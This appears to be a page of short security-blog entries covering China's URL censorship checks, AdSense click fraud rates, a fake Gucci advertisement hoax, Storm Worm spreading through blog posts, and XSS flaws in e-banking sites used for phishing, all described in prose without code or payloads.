Real Time Censored URL Check in China

While the original initiative for a real-time URL censorship check in China was originally realized as a project by Jonathan Zittrain and Benjamin Edelman couple of years ago, it's great to see someone continued what they've started and came up with the GreatFirewallofChina.org :

"Aim of this website is to be a watchdog and keep track of which and how many or how many times sites are censored. Help to keep the censorship transparent. Each blocked website will automatically be added to the great firewall on the homepage."

What you should keep in mind is that despite of the capability for URL checking, from a technical perspective the censorship in China is much more sophisticated. Realizing that URLs themselves can be obfuscated, proxies and many other alternatives such as TOR for instance used, dynamic page content scanning for subversive keywords and the same technique used for sms messages is what I have in mind. For instance, according to the GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn't mean a Taiwan independence related blog's content wouldn't get filtered. Moreover, it's perhaps even more disturbing to see various search results from a Chinese user's perspective, than figuring out whether an URL is blocked or not only. Here are two great screenshots confirming the twisted reality, and a recent summary of situation in China.

It would be great to see how this project evolves and starts taking presenting the results by confirming whether or not an URL is blocked in all of the countries on the world's censorship map, or ever better, start feeding local search engines with possibly censored keywords, summarize the results and emphasize on the big picture.

AdSense Click Fraud Rates

Google's single most profitable revenue generation source AdSense has always been under fire for click fraud and most importanly the company's been under public scrutiny for better communicating their efforts on fighting the problem. Third party companies emerged and started filling the niche by coming up with click fraud analytics software so that Google's major customers, even the small to mid-size business could take advantage of an automated way to analyze click anomalies. But how prelevant is the problem really? Should the discussion always orbit around Google's efforts, to its customers' vigilance and education on detecting click fraud, or should it shift to improving the communication between all participants, namely Google, its customers and the click auditing companies?

According to the most recent click fraud rate from Google - click fraud is only 0.002% of all clicks. Danny Sullivan has an in-depth analysis of the topic, emphasizing on the importance of detected click fraud rates :

"Finally, we have a click fraud rate from Google itself: less than 0.02 percent of all clicks slip past its filters and are caught after advertisers request reviews. That low figure is sure to bring out the critics who will disagree. Below, more about how Google comes up with the figure plus some click fraud fighting initiatives it plans to implement later this year.Why release this figure now, when many have wanted it for literally years?

"We've been working to be more transparent and informative on the issues related to click fraud. Recently, this metric has been something advertisers have specifically asked for and we agree that is useful in describing the scope of the problem. Further, it is something we measure and use to monitor the performance of our click fraud detection systems," said Shuman Ghosemajumder, business product manager for trust & safety at Google."

During July, 2006 Google commissioned a third-part analysis of their efforts to fight click fraud you will definitely find informative, and here's another research taking the discussion beyond the typical botnets and human clickers perspective. There are also false click fraud positives to keep in mind as shown in this analysis.

Stats courtesy of Clickfraudindex who by the way started blogging recently.

Social Engineering the Old Media

While the Rules of the Thirds are partly in place, the floating fragnance and his depressed look provide some clues. The story is very interesting though as it has happened before. As Tim Nudd comments on Adfreak :

"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have them bill Gucci directly for the $50,000. They’ll fall for it every time."

How it could have been prevented? Coordinating the campaign with local Gucci representatives, ensuring payment is processed before the ad is featured, or let's just say look at his face to figure out he's anything but a professional model.

Storm Worm Switching Propagation Vectors

The storm started with mass mailings, then the malware switched to IM propagation, and now the infected PCs are further spreading through blog and forum posts :

"But the twist comes when these people later post blogs or bulletin board notices. The software will insert into each of their postings a link to a malicious Web site, said Alperovitch, who rates the threat as "high."We haven't seen the Web channel used before," he said. "In the past, we've seen malicious links distributed to people in a user's address book and made to look like it's an instant message coming from them."

The smart thing is that compared to situations where malware authors have to figure how to bypass the forum's CAPTCHA or mass spam and generate new blogs, in this case the (infected) end user is authenticating both himself and the malware. Here are some malware stats on social networking sites worth going through as well.

UPDATE: Symantec has a nice analysis with some screenshots of this variant.

Credit Card Data Cloning Tactic

First of all, she's too cute for someone to even have the slightest suspicion, and to be honest the posers paying their coffee with a credit card deserve it -- it leaves them without the opportunity to leave a change at least that's what they've thought.

XSS Vulnerabilities in E-banking Sites

The other day I came across to this summary with direct examples of various XSS vulnerabilities at E-banking sites, and I wonder why the results still haven't gotten the necessary attention from the affected parties :

"First of all you should realize, that this is not the first time, that we are doing such a website. The last time we hit a vast number of sites, mostly german banks. We have shown, that those sites, that should be most secure are not! Many visitors saw the site and also the banks seemed quite upset, nevertheless they fixed the problems, that we pointed at. You can check out the archive at: [English version] and [German version]. This project has been done as a direct reaction to the poll done in austria not long ago and which was reported at [this article] from Heise. For the english readers of you, this article basically says, that 9 of 10 people using online banking in austria trust the security, that their banks offer."

The best phishing attack at least from a technical perspective is the one that's using a vulnerability in the targeted's brand site to further improve its truthfulness, and believe it or not, certain phishing attacks are actually loading images directly from the victim's sites instead of coming up with the phish creative on their own.